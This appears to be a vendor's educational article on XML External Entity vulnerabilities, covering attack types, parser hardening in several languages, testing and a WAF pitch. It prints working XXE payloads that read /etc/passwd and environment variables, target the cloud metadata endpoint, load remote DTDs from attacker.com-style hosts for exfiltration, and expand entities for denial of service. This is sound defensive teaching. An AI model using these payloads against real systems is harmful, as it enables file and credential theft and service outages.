XML External Entity (XXE): How to Identify and Fix Vulnerabilities

What Is an XXE Vulnerability?

An XXE (XML External Entity) vulnerability is a flaw in how an application processes XML input. When an XML parser is configured to allow external entity references and the application accepts XML from untrusted sources without proper validation, an attacker can craft malicious XML that forces the parser to read local files, make internal network requests, or, in some environments, execute arbitrary code.

Imagine handing someone a form to fill in, but they write instructions on it instead of data and your system follows those instructions. That is what an XXE vulnerability allows.

The risk is serious. A single misconfigured XML parser can expose password files, internal server details, cloud metadata, and more. XXE vulnerabilities fall under A05:2021 – Security Misconfiguration in the OWASP Top 10 and have been behind serious security incidents.

What Is an XXE Attack?

An XXE attack exploits an XML external entity vulnerability to make the application’s parser fetch resources it should never touch. The attacker supplies XML with a specially crafted <!DOCTYPE> declaration that defines an external entity pointing to a sensitive file or URL. When the parser processes it, it resolves the entity and returns the contents to the attacker.

An Example of an XXE Attack

Suppose an application accepts XML input from untrusted sources and uses an XML parser that supports external entities. The application parses an XML file containing user input and returns the results to the user.

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

In this XXE example, the XML input defines an external entity “xxe” that points to a local file “/etc/passwd” on the server.

When the XML parser encounters the “xxe” entity reference, it retrieves the local file’s contents and includes them in the parsed XML document. The attacker can then use this technique to read sensitive data stored on the server, such as the account names in /etc/passwd or secrets held in configuration files.

Alternatively, the attacker can point the entity at a remote resource they control, which is the starting point for more advanced attacks:

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://acme.com/payload.dtd">
]>
<foo>&xxe;</foo>

In this example, the XML input defines an external entity “xxe” that points to a remote document type definition (DTD) file “http://acme.com/payload.dtd” controlled by the attacker. The DTD file can define parameter entities that fetch further resources or build new entity declarations, such as:

<!ENTITY % remote SYSTEM "http://acme.com/malware.bin">
<!ENTITY % cmd "<!ENTITY &#x25; error SYSTEM 'file:///dev/null'>&#x25;error;">

When the XML parser encounters the “xxe” entity reference, it makes an outbound request for the remote DTD file. That request alone tells the attacker that external entities are enabled.

If the parser also expands the parameter entities defined in the DTD file, the attacker can chain them to read local files and send the contents to a server they control. XXE does not normally execute code by itself; code execution is possible only in specific environments, such as PHP with the expect extension loaded. Even without it, the attacker can use this technique to steal sensitive data or launch further attacks.

High Profile XXE Hacks

Several high-profile vulnerabilities and incidents over the years have involved XXE. Here are some examples:

Apache Tika (CVE-2025-66516, 2025): Rated CVSS 10.0 Critical, this vulnerability affects how Apache Tika processes PDF files containing XFA (XML Forms Architecture) data. The flaw sits in tika-core, not just the PDF module, so any system running tika-core versions 1.13 through 3.2.1 is exposed regardless of how securely the surrounding application code is written. No special configuration or authentication is needed; simply ingesting a malicious PDF triggers the exploit. Since Tika is embedded across hundreds of enterprise workflows including search indexing, ETL pipelines, and document previews, the attack executes silently in the background. This CVE makes a critical point: XXE risk does not sit only in your own code. It lives in every third-party library that parses XML.

SysAid (CVE-2025-2775 and CVE-2025-2776, 2025): Two XXE vulnerabilities in SysAid’s on-premise IT service management platform were added to CISA’s Known Exploited Vulnerabilities catalog, confirming active exploitation in the wild. Both flaws exposed organizations running unpatched SysAid instances to server compromise with no authentication required.

GoDaddy (2020): A security researcher found an XXE vulnerability in GoDaddy’s hosting infrastructure that exposed configuration files, environment variables, and internal secrets. GoDaddy patched it shortly after the report.

PayPal (2015): A researcher discovered an XXE flaw in PayPal’s Secure Payments API that allowed OAuth token theft and unauthorized account access. PayPal patched it promptly after responsible disclosure.

Most Common Types of XXE Attacks

Attackers can use several types of XML External Entity attacks to exploit vulnerabilities in XML parsers. Here are some of the most common types of XXE attacks:

1. External Entity Injection

In this type, an attacker injects malicious XML content containing external entities into an XML input field. These entities are then processed by the XML parser, allowing the attacker to read sensitive files, conduct SSRF (Server-Side Request Forgery) attacks, or, in some environments, execute arbitrary code.

External Entity Injection: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

2. Parameter Entity Injection

Parameter entity injection occurs when an attacker manipulates parameter entities within the Document Type Definition (DTD) of an XML document. Parameter entities are declared with a % sign and can only be referenced inside the DTD itself. By injecting malicious ones, attackers can achieve outcomes similar to those of external entity injection, such as reading files or reaching internal services.

Parameter Entity Injection: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">]>

3. Blind XXE

In blind XXE attacks, the attacker does not receive direct feedback about the existence or content of the files being accessed. Instead, the attacker relies on out-of-band callbacks or error-based techniques to infer the attack’s success. Blind XXE attacks are often used when direct retrieval of sensitive data is impossible.

Blind XXE: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com">]>

4. DTD (Document Type Definition) Manipulation

Attackers can manipulate the DTD to introduce or modify entities, allowing them to control how the XML document is processed. By crafting a malicious DTD, attackers can achieve various goals, including information disclosure, SSRF, and, in some environments, code execution.

DTD Manipulation: <!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">

5. Out-of-Band (OOB) XXE

Out-of-Band XXE attacks leverage the ability of the attacker to send data out-of-band, typically over DNS or HTTP, to exfiltrate sensitive information from the target system. This approach is useful when direct data retrieval is impossible due to network restrictions or other limitations.

Out-of-Band (OOB) XXE: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/dtd.dtd">]>

6. Entity Expansion

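In this type of attack, the attacker creates many nested entities in the XML document, each one referencing the entity below it several times. Expanding the top-level entity causes the XML parser to consume a large amount of memory, potentially leading to a denial of service (DoS) condition. An entity cannot reference itself, so the payload chains distinct entities.

Entity Expansion: <!DOCTYPE foo [<!ENTITY a "aaaaaaaaaa"><!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"><!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">]><foo>&c;</foo>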
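To see why nested entities are so effective, it helps to work out the arithmetic. The sketch below is illustrative only: the function name and parameters are hypothetical, and it assumes a chain in which each level references the level beneath it a fixed number of times.

```python
def expanded_size(levels: int, refs_per_level: int, base_len: int) -> int:
    """Characters produced by expanding the top entity of a nested chain.

    Level 0 is a literal string of base_len characters. Each higher level
    references the level below it refs_per_level times, so the size is
    multiplied by refs_per_level once per level.
    """
    return base_len * refs_per_level ** levels


if __name__ == "__main__":
    # Ten references per level over a three-character base string.
    for levels in (3, 6, 9):
        print(f"{levels} levels -> {expanded_size(levels, 10, 3):,} characters")
```

With nine nested levels, a document of roughly a kilobyte expands to 3,000,000,000 characters, which is why parsers should cap entity expansion or reject DTDs outright.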

7. XXE via File Upload

If an application accepts XML files for upload and processes them without proper validation, attackers can upload malicious XML files containing XXE payloads. Upon processing, these payloads can trigger XXE vulnerabilities in the application.

XXE via File Upload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

8. XPath Injection

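XPath is a query language that extracts data from XML documents. XPath injection is technically a separate vulnerability class: the attacker injects malicious input into an XPath query that the application builds from user data, allowing them to extract data the query was never meant to return. It is listed here because injected input that ends up inside an XML document can also carry entity declarations, as in the payload below.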

XPath Injection: </root><!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]>

9. XXE in SOAP Web Services

XML-based SOAP web services are also susceptible to XXE attacks. Attackers can inject malicious XML payloads into SOAP requests, exploiting XXE vulnerabilities in the server-side XML processing logic.

XXE in SOAP Web Services: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

XXE Payloads: A Quick Reference

Understanding the payload structure helps both attackers and defenders. Here are the most common XXE payload patterns and what each one does:

Payload Type | What It Does
--- | ---
SYSTEM "file:///etc/passwd" | Reads a local file from the server filesystem
SYSTEM "http://internal-host/endpoint" | Triggers a server-side request (SSRF) to an internal service
SYSTEM "http://attacker.com/dtd.dtd" | Loads a remote malicious DTD for advanced exploitation
SYSTEM "file:///proc/self/environ" | Reads environment variables, which may contain secrets or API keys
SYSTEM "http://169.254.169.254/latest/meta-data/" | Targets the AWS instance metadata endpoint to steal cloud credentials
Nested entity expansion (&x;&x;...) | Causes exponential memory consumption, leading to denial of service
OOB via DNS (%xxe; in DTD) | Exfiltrates data covertly via DNS lookup, bypassing response filtering

When testing for XXE, these payloads are the starting point. When defending, these are exactly what your XML parser configuration should block.
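As a rough illustration of how a defender might sort the SYSTEM identifiers above by risk, here is a minimal Python sketch. The function name and category labels are hypothetical, and the logic only inspects the URI text; it does not resolve hostnames.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_system_id(system_id: str) -> str:
    """Give a coarse risk label to the URI used in an entity declaration."""
    parts = urlsplit(system_id)
    if parts.scheme == "file":
        return "local-file"
    host = parts.hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A hostname, not an IP literal; it cannot be judged without DNS.
        return "remote-host"
    # Check link-local first: 169.254.0.0/16 also counts as private.
    if ip.is_link_local:
        return "link-local-metadata"
    if ip.is_private or ip.is_loopback:
        return "internal-network"
    return "remote-host"


if __name__ == "__main__":
    for uri in (
        "file:///etc/passwd",
        "http://169.254.169.254/latest/meta-data/",
        "http://10.0.0.5/admin",
        "http://attacker.com/dtd.dtd",
    ):
        print(uri, "->", classify_system_id(uri))
```

A name such as internal-host is reported as remote-host here because the sketch never performs a lookup; a real filter would need to resolve names and re-check the resulting addresses.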

XXE Prevention: How to Stop XXE Attacks

Preventing XML External Entity attacks requires a combination of secure coding practices, proper configuration, and ongoing vigilance. Here are the most effective controls:

1. Disable External Entity Processing

This is the most important fix. Configure every XML parser in your stack to reject external entities and DTD processing entirely.

Java: Disable external entity processing in DocumentBuilderFactory:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

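.NET: Set XmlReaderSettings to prohibit DTD processing: settings.DtdProcessing = DtdProcessing.Prohibit; The older settings.ProhibitDtd = true; property is obsolete as of .NET Framework 4.0.

PHP: On versions before PHP 8.0, disable entity loading with libxml_disable_entity_loader: libxml_disable_entity_loader(true); The function is deprecated as of PHP 8.0, which requires libxml 2.9.0 or later, where external entity loading is disabled by default. Avoid passing the LIBXML_NOENT flag, which turns entity substitution back on.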
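The same principle can be sketched in Python using only the standard library's expat bindings. This is a minimal illustration, not a complete parser: the function and exception names are hypothetical, and it simply aborts as soon as a DOCTYPE appears, so no entity can be declared by the sender.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def parse_rejecting_doctype(xml_text: str) -> list[str]:
    """Parse XML and return the element names in document order.

    Any DOCTYPE aborts the parse before entity declarations are read.
    """
    parser = xml.parsers.expat.ParserCreate()
    seen: list[str] = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising inside a handler stops expat and propagates to the caller.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    def on_start(name, attrs):
        seen.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(xml_text, True)
    return seen


if __name__ == "__main__":
    print(parse_rejecting_doctype("<order><id>1</id></order>"))
    try:
        parse_rejecting_doctype(
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            "<foo>&xxe;</foo>"
        )
    except DoctypeForbidden as exc:
        print("rejected:", exc)
```

Rejecting the DOCTYPE outright mirrors the disallow-doctype-decl approach in the Java snippet and is usually simpler to reason about than disabling individual entity types.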

2. Input Validation and Sanitization

Validate all XML input before it reaches the parser. Use allowlisting to define exactly which XML structures, elements, and attributes are permitted. Reject anything outside that definition. Do not try to sanitize malicious XML after the fact.
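A minimal allowlist check might look like the Python sketch below. The element and attribute names are a hypothetical schema for an order document, and the check assumes the tree was produced by a parser that has already been hardened against external entities; it complements parser configuration rather than replacing it.

```python
import xml.etree.ElementTree as ET

# Hypothetical allowlist: element name -> attributes permitted on it.
ALLOWED = {
    "order": {"id"},
    "item": {"sku", "qty"},
    "note": set(),
}


def violations(root: ET.Element, allowed: dict = ALLOWED) -> list[str]:
    """List every element or attribute that is not on the allowlist."""
    problems = []
    for el in root.iter():
        if el.tag not in allowed:
            problems.append(f"unexpected element <{el.tag}>")
            continue
        for attr in el.attrib:
            if attr not in allowed[el.tag]:
                problems.append(f"unexpected attribute {attr!r} on <{el.tag}>")
    return problems


if __name__ == "__main__":
    doc = ET.fromstring('<order id="7"><script/><item sku="A1" onload="x"/></order>')
    for problem in violations(doc):
        print(problem)
```

A document is accepted only when the returned list is empty; anything else is rejected rather than repaired.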

3. Use Safe XML Parsers

Modern XML libraries include built-in protections. Prefer them over legacy parsers, and keep them updated. An outdated XML library is one of the most common reasons XXE vulnerabilities persist in production.

4. Implement Proper Access Controls

Run XML parsing operations under the least-privileged account possible. Even if an XXE attack succeeds, access controls limit what the parser can read. A parser running as root with full filesystem access is far more dangerous than one running as a restricted service account.

5. Apply Content Security Policies (CSP)

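Use CSP to control which external resources, including DTDs, can be loaded by your web application in the browser. Note that CSP is enforced client-side, so it does not stop a server-side parser from fetching a remote DTD. To cut off the remote DTD attack vector on the server, pair strict policies with outbound network restrictions so that hosts which parse XML cannot reach untrusted sources.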

6. Monitor and Log XML Parsing Activity

Add logging to detect unusual XML parsing behaviour: unexpected external entity declarations, excessive resource consumption, unusual file paths in entity references. Alerts on these patterns can catch XXE attempts in real time before they succeed.
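One way to approach this kind of logging is a lightweight pattern check on the raw request body before it is parsed. The Python sketch below is an assumption-laden illustration: the rule names and regular expressions are hypothetical, and simple text matching can be evaded by alternate encodings, so it should feed alerts rather than act as the only control.

```python
import re

# Hypothetical detection rules: label -> pattern to look for in raw XML.
RULES = {
    "doctype": re.compile(r"<!DOCTYPE", re.IGNORECASE),
    "external_entity": re.compile(
        r"<!ENTITY\s+(?:%\s+)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
    ),
    "sensitive_target": re.compile(
        r"file://|169\.254\.169\.254|/proc/self/", re.IGNORECASE
    ),
}


def flag_suspicious(xml_text: str) -> list[str]:
    """Return the sorted labels of every rule that matches the input."""
    return sorted(name for name, pattern in RULES.items() if pattern.search(xml_text))


if __name__ == "__main__":
    body = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
    hits = flag_suspicious(body)
    if hits:
        print("ALERT: suspicious XML markers:", ", ".join(hits))
```

Logging the matched labels alongside the source address and endpoint gives responders enough context to tell a scanner probe from a targeted attempt.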

7. Keep a Continuous Patching Cycle

Vulnerability patching must be ongoing, not a one-time event. Security scanners and penetration testers will find new issues as your application evolves. Dedicated remediation sprints, not ad hoc fixes, keep your XXE exposure window short.

How to Test for XXE Vulnerabilities

Use Automated Scanning Tools

Run automated DAST (Dynamic Application Security Testing) tools such as Indusface WAS against your application regularly. Automated scanners catch the most common XXE patterns quickly and consistently across all endpoints.

Identify the XML Parser in Use

Know which XML library each service uses. Different parsers have different defaults: some disable external entities by default, others do not. Audit your dependencies and check each parser’s configuration explicitly.

Conduct Penetration Testing

Automated tools find common patterns; skilled penetration testers find what automated tools miss. The Indusface WAS Premium plan bundles annual penetration testing and revalidation with the automated scanner. Manual test cases for XXE should include:

  • Basic payload submission: Submit an external entity payload and check if the response contains data from the referenced file or URL.
  • Malicious payload submission: Submit a payload designed to read sensitive files (/etc/passwd, /proc/self/environ) or reach internal services.
  • Error message analysis: Check whether error messages leak XML parser details or partial content from the referenced resource.
  • Blind XXE testing: Submit a payload with an out-of-band callback URL and monitor DNS or HTTP logs for a hit. This confirms the parser resolved the entity even when no data appears in the response.

Re-test after every significant code change. New features often introduce new XML processing paths that inherit old parser configurations.
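The basic payload test can also be automated as a regression check against your own parsing code. The Python sketch below is a minimal example under stated assumptions: the helper names and the canary value are hypothetical, and the parse function under test is expected to take an XML string and return whatever text the application would echo back.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Callable

MARKER = "xxe-canary-7f3a"  # arbitrary value, unlikely to appear by chance


def resolves_external_entities(parse: Callable[[str], str]) -> bool:
    """Return True if `parse` leaks the contents of a canary file."""
    with tempfile.TemporaryDirectory() as tmp:
        canary = Path(tmp) / "canary.txt"
        canary.write_text(MARKER)
        payload = (
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{canary.as_uri()}">]>'
            "<foo>&xxe;</foo>"
        )
        try:
            return MARKER in parse(payload)
        except Exception:
            # A parser that rejects the document did not resolve the entity.
            return False


def stdlib_parse(xml_text: str) -> str:
    """Parse with the standard-library ElementTree and re-serialize."""
    root = ET.fromstring(xml_text)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print("vulnerable:", resolves_external_entities(stdlib_parse))
```

Swapping stdlib_parse for a wrapper around the parser your service actually uses turns this into a check that can run on every build. It covers only in-band file disclosure, so blind XXE still needs the out-of-band test described above.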

How to Patch an XXE Vulnerability

Once a vulnerability is confirmed, remediation follows a clear path:

Upgrade the XML parser: If the XML parser used by the application or system is known to be vulnerable to XXE attacks, upgrade to a more secure version. If the parser offers options to disable external entity processing, enable them as part of the upgrade.

Sanitize user input: To prevent malicious input from being included in XML documents, validate and sanitize all user input before including it in an XML document.

Implement access controls: Limit access to sensitive resources and prevent unauthorized access. This reduces the impact of any XXE attack that does succeed.

Monitor for suspicious activity: Monitor the application or system for suspicious activity, such as attempts to access sensitive files or reach internal services. This can help find XXE attacks in real time.

As with vulnerability detection, patching must be continuous. With dedicated sprints for patching, you stay on top of the open vulnerabilities that your automated scanners and pen testers find.

How AppTrana WAF Blocks XXE Attacks

Not all XXE vulnerabilities can be patched immediately. Third-party plugins, legacy dependencies, or vendor timelines sometimes mean a code fix is weeks or months away. Virtual patching on the WAF protects the application while the underlying issue is resolved.

AppTrana protects against XXE through five layers:

Signature-based detection: Incoming XML payloads are compared against a continuously updated database of known XXE patterns. Matching requests are blocked before they reach the application.

Protocol validation: AppTrana validates that incoming XML documents conform to the expected schema or DTD. Documents that deviate, including those with unexpected DOCTYPE declarations, are blocked.

Input validation: AppTrana scans incoming user input for common XXE payload patterns and blocks requests containing them before they are parsed by the application.

Parameterized query enforcement: For database-related XML processing, AppTrana mandates parameterized queries, preventing malicious XML payloads from reaching query execution.

XML parsing protection (on by default): External entity processing is disabled at the WAF layer. This is active from day one, with no configuration required.

Phani Deepak Akella

Phani heads the marketing function at Indusface. He handles product marketing and demand generation. He has worked in the product marketing function for close to a decade and specializes in product launches, sales enablement and partner marketing. In the application security space, Phani has written about web application firewalls, API security solutions, pricing models in application security software and many more topics.

Frequently Asked Questions (FAQs)

What is the difference between XXE and SSRF?

XXE and SSRF are distinct vulnerabilities but are often chained together. XXE is a flaw in XML parsing; SSRF is a flaw that allows an attacker to make the server send requests to internal or external URLs. An XXE vulnerability can be used to trigger SSRF by defining an external entity that points to an internal URL, effectively turning a parser flaw into a network-level attack.

How does an XXE attack work?

An XXE attack works in four steps. First, the attacker identifies an application that accepts XML input. Second, they craft a malicious XML payload containing a DOCTYPE declaration with an external entity pointing to a sensitive resource. Third, they submit the payload to the application. Fourth, the XML parser resolves the entity and returns the contents of the referenced resource, such as a local file or an internal network response.

What can an attacker do with an XXE vulnerability?

An attacker who successfully exploits an XXE vulnerability can read sensitive files from the server filesystem, perform server-side request forgery to reach internal services, steal cloud credentials from metadata endpoints, exfiltrate data covertly over DNS or HTTP, and in some cases cause a denial of service by triggering exponential entity expansion. In severe cases, XXE can lead to full server compromise.

How can XXE attacks be prevented?

The most effective way to prevent XXE attacks is to disable external entity processing in your XML parser at the configuration level. In Java, set the external-entity features on DocumentBuilderFactory to false and enable disallow-doctype-decl. In .NET, set DtdProcessing to DtdProcessing.Prohibit (ProhibitDtd on older framework versions). In PHP before 8.0, call libxml_disable_entity_loader(true); from PHP 8.0 onward, external entity loading is disabled by default. Beyond parser hardening, validate all XML input, use modern parser libraries with secure defaults, enforce least-privilege access for parsing processes, and use a WAF for virtual patching when a code fix is not immediately possible.

What is blind XXE?

Blind XXE is a variant of the XXE attack where the attacker receives no direct output in the application response. Instead, they use out-of-band techniques such as DNS lookups or HTTP callbacks to confirm that the parser resolved the external entity and to exfiltrate data. Blind XXE is harder to detect and is commonly used when the application does not return parsed content to the user.

What is the difference between XML injection and XXE?

XML injection involves inserting malicious content into XML data to alter the document structure or application logic, typically targeting the application layer. XXE is a specific type of XML attack that exploits the parser itself by referencing external entities, targeting the infrastructure layer. XXE is generally considered more severe because it can reach the server filesystem and internal network, not just manipulate application data.

How do you test for XXE vulnerabilities?

Testing for XXE involves submitting crafted XML payloads with external entity references to every endpoint that accepts XML input, including file uploads, API requests, and SOAP services. Submit a payload referencing a local file and check whether the response contains file contents. For blind XXE, use an out-of-band callback server and monitor for DNS or HTTP hits. Automated DAST tools such as Indusface WAS can scan for XXE across all endpoints systematically. Retest after every significant code change.